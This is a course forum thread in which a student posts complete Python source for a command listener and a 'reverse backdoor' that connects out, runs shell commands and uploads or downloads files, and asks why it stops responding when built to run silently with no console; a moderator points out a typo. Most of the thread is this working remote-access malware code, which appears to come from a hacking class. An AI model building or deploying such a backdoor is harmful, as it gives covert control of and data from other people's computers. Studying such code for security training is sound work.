  • #41758
    Peter Queen
    Participant

    Hello Diego,

    Me again! I have a problem with executing commands silently; the program was working fine up until I added the –noconsole command.

    Now the connection gets established, but when I try to execute any command nothing happens, and eventually I have to stop it with Ctrl+C.

    Here is the listener code:

    #!/usr/bin/env python
    
    import socket
    import json
    import base64
    
    class Listener:
        """Operator-side end of the JSON-over-TCP channel used in this thread.

        The constructor binds a TCP socket and accepts a single peer; run()
        then reads commands from the terminal, sends each one as a JSON list
        and prints the reply.  The code is Python 2 (raw_input, str passed
        straight to socket.send).  The channel carries no authentication and
        no encryption: the first host to connect is accepted as the peer and
        every message crosses the network as cleartext JSON.
        """

        def __init__(self, ip, port):
            """Bind to (ip, port) and block until one peer has connected."""
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # SO_REUSEADDR allows re-binding the port right after a restart.
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            # accept() blocks; only this one connection is kept on the instance.
            self.connection, address = listener.accept()
            print("[+] Connection established from " + str(address))
    
        def reliable_send(self, data):
            """Serialise data as JSON and write it to the connection."""
            json_data = json.dumps(data)
            # NOTE(review): send() may write only part of the buffer and its
            # return value is not checked here.
            self.connection.send(json_data)
    
        def reliable_receive(self):
            """Read from the connection until the buffer parses as JSON.

            Chunks of up to 1024 bytes are appended to a buffer and json.loads
            is retried after each one; ValueError means "incomplete, keep
            reading".

            NOTE(review): the buffer has no size limit and the data comes from
            the remote peer.  recv() returning an empty string (peer closed the
            connection) is not handled: json.loads("") raises ValueError, so
            the loop spins forever.  If the peer simply never replies, the
            recv() call blocks indefinitely, which matches the "nothing
            happens until Ctrl C" symptom described in the post.
            """
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            """Send the command list and return the peer's reply.

            For "exit" the connection is closed and the process terminates
            without waiting for a reply.
            """
            self.reliable_send(command)
            if command[0] == "exit":
                self.connection.close()
                # exit() raises SystemExit, which the `except Exception` in
                # run() does not catch.
                exit()
    
            return self.reliable_receive()
    
        def write_file(self, path, content):
            """Write the base64 payload received from the peer to path.

            NOTE(review): base64 has no function named b64dencode (the other
            script in this post uses b64decode), so this line raises
            AttributeError.  The file has already been opened in "wb" mode by
            then, so path is created or truncated before the failure, and
            run() replaces the exception with its generic error string.
            """
            with open(path, "wb") as file:
                file.write(base64.b64dencode(content))
                return "[+] Download successful"
    
        def read_file(self, path):
            """Return the contents of the local file at path, base64-encoded."""
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
    
        def run(self):
            """Prompt loop: read a command, send it, print the outcome."""
            while True:
                command = raw_input(">> ")
                # Split on single spaces only, so an argument that contains a
                # space arrives as several list items.
                command = command.split(" ")
                try:
                    if command[0] == "upload":
                        # The encoded file content travels as a third list item.
                        file_content = self.read_file(command[1])
                        command.append(file_content)
    
                    result = self.execute_remotely(command)
    
                    # A reply that does not contain the error marker is taken
                    # to be file content and saved under the requested name.
                    if command[0] == "download" and "[-] Error " not in result:
                        result = self.write_file(command[1], result)
                # NOTE(review): every exception, including coding mistakes such
                # as a misspelled function name, is reduced to the same generic
                # message, which hides the actual cause.
                except Exception:
                    result = "[-] Error during command execution"
    
                print(result)
    
    # Script entry point.  Address and port are hard-coded; 10.0.2.15 lies in
    # the private 10.0.0.0/8 range.  The constructor blocks until a peer
    # connects, then run() starts the interactive prompt.
    my_listener = Listener("10.0.2.15", 4444)
    my_listener.run()

    and here is the reverse backdoor:

    ##!/usr/bin/env python
    
    import socket
    import subprocess
    import json
    import os 
    import base64
    import sys
    
    class Backdoor:
        """Client end of the JSON-over-TCP channel used in this thread.

        Connects out to the listener and serves the command lists it sends:
        "exit", "cd", "download", "upload", and anything else is handed to the
        system shell.  Python 2 code, same unauthenticated cleartext framing as
        the listener.  What the code visibly does on a host: one outbound TCP
        connection to a fixed address, shell child processes started with
        stdin and stderr pointed at the null device, and file reads/writes at
        paths named by the remote side.
        """

        def __init__(self, ip, port):
            """Open the outbound TCP connection to (ip, port)."""
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
    
        def reliable_send(self, data):
            """Serialise data as JSON and write it to the connection."""
            json_data = json.dumps(data)
            # NOTE(review): the return value of send() is not checked.
            self.connection.send(json_data)
    
        def reliable_receive(self):
            """Read from the connection until the buffer parses as JSON.

            NOTE(review): unbounded buffer; an empty recv() result (connection
            closed) makes json.loads("") raise ValueError on every pass, so
            the loop never ends.
            """
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_system_command(self, command):
            """Run command through the shell and return its captured stdout.

            NOTE(review): `stdeer` is not a keyword that check_output accepts;
            as the reply in this thread says, the intended name is stderr.
            The call therefore raises TypeError, which run() catches.
            The handle opened on os.devnull is never closed, so one file
            descriptor is left open per call.
            """
            DEVNULL = open(os.devnull, "wb")
            return subprocess.check_output(command, shell=True, stdeer=DEVNULL, stdin=DEVNULL)
    
        def change_working_directory_to(self, path):
            """Change the process working directory and return a status line."""
            os.chdir(path)
            return "[+] Changing working directory to " + path
    
        def read_file(self, path):
            """Return the contents of the file at path, base64-encoded."""
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
    
        def write_file(self, path, content):
            """Decode the base64 content and write it to path."""
            with open(path, "wb") as file:
                file.write(base64.b64decode(content))
                return "[+] Upload successful"
    
        def run(self):
            """Serve commands from the listener until "exit" is received."""
            while True:
                command = self.reliable_receive()
                
                try:
                    if command[0] == "exit":
                        self.connection.close()
                        # SystemExit is not a subclass of Exception, so the
                        # handler below does not intercept it.
                        sys.exit()
                    elif command[0] == "cd" and len(command) > 1:
                        command_result = self.change_working_directory_to(command[1])
                    elif command[0] == "download":
                        command_result = self.read_file(command[1])
                    elif command[0] == "upload":
                        command_result = self.write_file(command[1], command[2])
                    else:
                        # Includes a bare "cd" with no argument.
                        command_result = self.execute_system_command(command)
                    self.reliable_send(command_result)
                # NOTE(review): the reply is sent inside the try block, so when
                # any branch above raises, the message assigned here is never
                # transmitted and the listener keeps waiting in
                # reliable_receive().
                except Exception:
                    command_result = "[-] Error during command execution"
    
    # Script entry point.  The peer address and port are hard-coded
    # (10.0.2.15 lies in the private 10.0.0.0/8 range); the constructor
    # connects immediately and run() then loops on received commands.
    my_backdoor = Backdoor("10.0.2.15", 4444)
    my_backdoor.run()

    I watched the lesson several times to see if I made a mistake, but I can't spot it.

    Thanks

    #41760
    Peter Queen
    Participant

    P.S. Although it doesn’t show in the post, there are two separate dashes before the word noconsole.

    #41781
    Diego Pérez
    Moderator

    Hi Peter!
    You have a typo in this line:
    stdeer=DEVNULL
    It should be stderr, so change it and let me know how it goes!

    Are you getting any errors while compiling it? Are you doing it on Windows or Linux?

    Let me know.
    Diego
